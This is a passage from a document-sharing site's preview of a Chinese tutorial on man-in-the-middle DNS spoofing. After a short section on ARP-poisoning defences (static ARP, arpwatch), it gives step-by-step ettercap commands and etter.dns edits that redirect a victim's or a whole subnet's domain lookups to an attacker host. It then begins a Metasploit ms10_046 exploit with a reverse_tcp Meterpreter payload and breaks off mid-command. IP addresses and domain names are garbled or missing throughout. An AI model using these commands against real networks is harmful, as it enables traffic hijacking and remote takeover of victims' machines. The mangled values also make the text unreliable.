中间人攻击之DNS欺骗_第1页
中间人攻击之DNS欺骗_第2页
中间人攻击之DNS欺骗_第3页
中间人攻击之DNS欺骗_第4页
中间人攻击之DNS欺骗_第5页
已阅读5页,还剩6页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、中间人攻击-DNS欺骗在前面的文章(中间人攻击-ARP毒化)中,我们讨论了黑客危险的攻击和实用的ARP中毒原理。在本文中,我将首先探讨检测和防止ARP中毒(或ARP欺骗)攻击,然后我将回顾其他的中间人攻击-DNS欺骗。ARP缓存攻击是一项非常危险的攻击,重要的是在用户中创建安全的意识和分析有效的工具和策略。如果你操作的是小型网络,那么就很容易维护ARP。但是在大型的网络,维护ARP是很困难和费事的。在前一篇文章的最后我们讨论了工具和技术,能够被用来检测ARP缓存中毒攻击。让我们来回顾下每一步:静态ARP你可以在网络ARP表中手动的添加一些信息,一旦信息插入,你就有了静态ARP映射。输入数据的过

2、程也是非常简单,在你的终端/CMS中,只需输入:“arp -s”例子:你现在的ARP表:rootbt:# arpAddress HWtype HWaddress Flags Mask Iface ether 00:22:93:cf:eb:6d C eth0让我们假设一下,我想添加一个新的主机在我的ARP缓存表中,我输入如下命令:arp -s IP MACrootbt:# arp -s 00:50:FC:A8:36:F5rootbt:# arpAddress HWtype HWaddress Flags Mask Iface e

3、ther 00:50:fc:a8:36:f5 CM eth0 ether 00:22:93:cf:eb:6d C eth0rootbt:#需要注意的是,手动添加ARP表只适用于当前的会话。当你重新启动计算机,将更新表。如果你想要使用这种方法,那么你可以创建一个批处理文件/BASH文件,并将它们添加到启动项。ARPwatch(ps:监听ARP记录)这是一个不错的实用程序,已经被用来监测ARP网络,它能够探测并记录发生更改的网络,同时还发送邮箱详细说明各自的变化。安装过程也是非常简单的。对于Ubuntu用户:# apt-get install arpwatch推荐精选root

4、bt:# arpwatch -hVersion 2.1a15usage: arpwatch -dN-f datafile-i interface-n net/width-r file-s sendmail_path-p-a-m addr-u username-R seconds -Q-z ignorenet/ignoremask如果需要快速检测就用下面这个命令:# arpwatch -i interface rootbt:# arpwatch -i eth0检查程序是否在运行:rootbt:# ps -ef| grep arpwatcharpwatch 1041 1 0 14:05 ? 00:

5、00:00 /usr/sbin/arpwatch-u arpwatch -N-proot 2191 2165 0 14:54 pts/0 00:00:00 grep color=auto arpwatch接下来的步骤就是ARPwatch记录日志,这也非常简单,你只需要做得是确定目录,然后读取文件。rootbt:# cd /var/lib/arpwatchrootbt:/var/lib/arpwatch# lsarp.dat arp.dat-rootbt:/var/lib/arpwatch# cat arp.dat00:50:fc:a8:36:f5 1337437776

6、eth000:27:0e:21:a6:1e 1337437923 eth0所以如果你是网络管理员,那么你应该实施一些策略来监视ARP表并且保护主机免受ARP中毒攻击。当然我们要注意,中间人攻击并不局限于一个ARP欺骗攻击。正如前面提到的,还有许多其他的技术能够执行一个中间人攻击。一个主要的例子就是DNS欺骗,我们将分析它。DNS欺骗攻击DNS欺骗攻击是一种非常危险的中间人攻击,它容易被攻击者利用并且窃取用户的机密信息。虽然这篇文章可以提供一些新的见解,但重要的是DNS欺骗是一个一般概念,有无数种方法可以实现一个DNS欺骗攻击。在一个DNS欺骗攻击中,攻击者可以利用一个漏

7、洞来伪造网络流量。因此,要理解DNS欺骗攻击,必须理解DNS是怎样工作的。DNS(域名系统)在互联网中是一个非常重要的协议。它属于TCP/IP,是一个分层结构的分布式模块,它包含域名的相关信息。它负责在网络上映射域名到他们各自的IP上。DNS定位主机/服务器通过查看友好域名,使用域名系统,DNS将域名和IP地址相互映射。这些设备(路由器、服务器等)连接到你的电脑不能理解一些友好的名称(),他们只了解一个IP地址,而DNS负责翻译它。让我们来看看下面这个图来理解主机和本地DNS服务器的正常通信。推荐精选DNS服务器包含着一个主数据库,其中包括信息的IP地址,因为这涉及到相应的域名。所以在这些正常

8、的通信中,一个主机发送请求到服务器,之后服务器响应正确的信息。如果DNS没有信息传入的请求,它将发送请求到外部DNS服务器来获取正确的响应。那么攻击者如何使用中间人攻击来实施DNS欺骗呢?下图说明了答案:使用DNS欺骗中间人攻击,攻击者将截取会话,然后转移到一个假网站的会话。假如:用户希望访问,并且谷歌的IP地址为7,攻击者就可以使用DNS欺骗技术拦截会话,并将用户重定向到假冒的网站,假网站IP可以为任意IP。演示DNS欺骗攻击在本系列的以前文章中我发现ettercap是一个很好用来演示ARP欺骗攻击的工具。当然ettercap包含一个DNS插件,非常容易使用哦。推荐精

9、选打开ettercap GUI,点击sniff,之后再unified sniffing选择自己的网络。单机hosts,之后扫描整个子网存活的主机。在执行时,我们来编辑etter.dns文件,以确保它执行正确的DNS欺骗攻击:microsoft sucks ;)# redirect it to # A 6* A 6 PTR 6 # Wildcards in PTR are not allowed默认情况下,ettercap是重定向到另一个网站的IP地址,我们来改变它:推荐精选 A 192.16

10、8.1.12* A 2 PTR 2 # Wildcards in PTR are not allowed2是攻击者的IP地址。确保Web服务器运行在攻击者的机器,一定要启用IP转发。在受害者的电脑查看:C:ping Pinging 01 with 32 bytes of data:Reply from 0: bytes=32 time=167ms TTL=54Reply from 0: bytes=32 time=167ms TTL=54Reply from 65.55

11、.58.20: bytes=32 time=167ms TTL=54Ping statistics for 0Packets: Sent = 4, Received = 4, Lost = 0 ,在ettercap GUI上,选择受害者主机(目标1)和默认路由器(网关,目标2)。点击Mitm-ARP poisoning,选择Sniff remote connerctions.之后点击start-start sniffing推荐精选点击选择plugins-manage the plugins在其中选择dns_spoof。这将会启用dns_spoof插件来执行DNS欺骗中间人攻

12、击。现在在受害者电脑的DNS欺骗攻击是:你可以看到,在DNS已经成功欺骗时,所有会话被转移到了攻击者的主机,而不是真正的微软服务器。这个演示是基于GUI的ettercap,你也可以使用命令行版本。让我们考虑一个快速演示DNS欺骗的命令行接口。选择etter。查看Dns使用简单的命令:rootbt:# locate etter.dns/usr/local/share/videojak/etter.dns/usr/share/ettercap/etter.dnsrootbt:#现在你可以使用你喜欢的文本编辑器来编辑这个文件。你可以使用文本编辑器nano或者其他任何你想要的rootbt:# gedi

13、t /usr/share/ettercap/etter.dnsrootbt:# nano /usr/share/ettercap/etter.dns当你完成了保存这个文件,现在做好了准备。我们需要做得就是通过ettercap启用DNS欺骗攻击:rootbt:# ettercap -T-q-P dns_spoof -M arp /ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGAListening on eth0.(Ethernet)eth0 - 00:1C:23:42:8D:04 2 SSL dis

14、section needs a valid redir_command_on script in the etter.conf filePrivileges dropped to UID 65534 GID 65534.28 plugins39 protocol dissectors53 ports monitored7587 mac vendor fingerprint1698 tcp OS fingerprint2183 known servicesRandomizing 255 hosts for scanning.Scanning the whole netmask for 255 h

15、osts.*推荐精选|=| 100.00 %4 hosts added to the hosts list.ARP poisoning victims:GROUP 1 : ANY (all the hosts in the list)GROUP 2 : ANY (all the hosts in the list)Starting Unified sniffing.Text only Interface activated.Hit h for inline helpActivating dns_spoof plugin.让我们来拆开命令结构,来分析DNS欺骗攻击所用到的命令: -P 使用插件,

16、这里我们使用的是dns_spoof -T使用基于文本界面 -q启动安静模式(不回显的意思) -M启动ARP欺骗攻击 /代表欺骗整个子网网络此外,我们可以综合使用这些命令。例如,你想要欺骗一个特定的受害主机,那么你可以使用受害者的IP来执行DNS欺骗攻击。rootbt:# ettercap -T-q-P dns_spoof -M arp //ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGAListening on eth0.(Ethernet)eth0 - 00:1C:23:42:8D:04 2 255

17、.255.255.0SSL dissection needs a valid redir_command_on script in the etter.conf filePrivileges dropped to UID 65534 GID 65534.28 plugins39 protocol dissectors53 ports monitored7587 mac vendor fingerprint1698 tcp OS fingerprint2183 known servicesRandomizing 255 hosts for scanning.Scanning the whole

18、netmask for 255 hosts.*推荐精选|=| 100.00 %4 hosts added to the hosts list.ARP poisoning victims:GROUP 1 : 00:16:41:ED:6A:D0在另一个例子中,你可以使用特定的接口来执行dns欺骗攻击。为此,可以使用如下命令:rootbt:# ettercap -T-q-i eth0 -P dns_spoof -M arp /DNS欺骗是一种非常危险的攻击,因为攻击者可以利用ettercap的dns_spoof插件和其他工具执行攻击。最终,攻击者可以使用一个社会工程工具包(作

19、者这里指的应该是SET了)来执行攻击去控制受害者的电脑。想象一下这是多少容易,通过社会工程工具包和DNS欺骗技术你所需要做得就是配置你的社会工程工具包和你的IP清单,制作像谷歌一样的网站欺骗域名到你的IP地址上。当受害者打开google,你的攻击将使它访问你的IP,之后建立一个远程的会话。让我们来考虑一个示例场景:下面是是metasploit 渗透工具使用ettercap进行dns欺骗。选择你想要的exploit,在payload中我们就选择 reverse_tcp:rootbt:# msfconsoleo 8 o o8 8 8ooYoYo.oPYo. o8P .oPYo.oPYo.oPYo.

20、 8 .oPYo. o8 o8P8 8 8 8oooo8 8 .oooo8 Yb. 8 8 8 8 8 8 88 8 8 8. 8 8 8 Yb. 8 8 8 8 8 8 88 8 8 Yooo 8 YooP8YooP 8YooP 8 YooP 8 8.:.:.:.:.:.:.:8.:.:.:.:.:8:= metasploit v3.7.0-release core:3.7 api:1.0+-= 684 exploits - 355 auxiliary+-= 217 payloads - 27 encoders - 8 nopsmsf use windows/browser/ms10_046_shortcut_icon_dllloadermsf exploit(ms10_046_shortcut_icon_dllloader) set SRVHOST 2SRVHOST = 2msf exploit(ms10_046_shortcut_icon_dllloader) set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD = window

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论